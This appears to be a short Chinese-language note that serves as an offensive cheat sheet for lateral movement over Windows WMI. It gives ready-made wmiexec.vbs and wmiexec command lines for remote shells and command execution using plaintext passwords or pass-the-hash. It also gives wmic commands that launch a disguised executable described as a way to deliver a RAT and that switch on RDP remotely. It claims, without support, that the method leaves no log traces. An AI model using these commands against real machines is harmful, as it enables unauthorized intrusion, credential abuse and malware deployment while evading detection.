WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
一、wmiexec.vbs 使用(需要目标用户的明文)
1. 半交互shell模式
cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 username password cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 hostname\username password cscript.exe //nologo wmiexec.vbs /shell 192.168.1.1 doamin\username password
2. 单条命令执行模式:
cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 username password "whoami" cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 hostname\username password "whoami" cscript.exe //nologo wmiexec.vbs /cmd 192.168.1.1 doamin\username password "whoami"
二、Wmiexec 使用(需要知道目标用户明文或者hash)
1. 半交互式shell模式:
wmiexec ./admin:password@192.168.1.1 wmiexec hostname/admin:password@192.168.1.1 wmiexec domain/admin:password@192.168.1.1 wmiexec -hashes :$HASH$ ./admin@192.168.1.1 wmiexec -hashes :$HASH$ hostname/admin@192.168.1.1 wmiexec -hashes :$HASH$ domain/admin@192.168.1.1
2. 执行命令模式
wmiexec ./admin:password@192.168.1.1 "whoami" wmiexec hostname/admin:password@192.168.1.1 "whoami" wmiexec domain/admin:password@192.168.1.1 "whoami" wmiexec -hashes :$HASH$ ./admin@192.168.1.1 "whoami" wmiexec -hashes :$HASH$ hostname/admin@192.168.1.1 "whoami" wmiexec -hashes :$HASH$ domain/admin@192.168.1.1 "whoami"
PS:该工具支持socks代理,并且在webshell下可以使用执行命令模式。
二、Wmi
该方式不需要上传任何工具,但是不会有任何回显,可以用于传递Rat执行。
wmic /node:192.168.3.168 /user:administrator /password:Passw0rd process call create "c:\windows\temp\plugin_update.exe" # 远程开启对方rdp,08以后的系统可能不太好使 wmic /node:192.168.3.36 /USER:administrator /password:admin PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
No Leanote account ? Sign up now.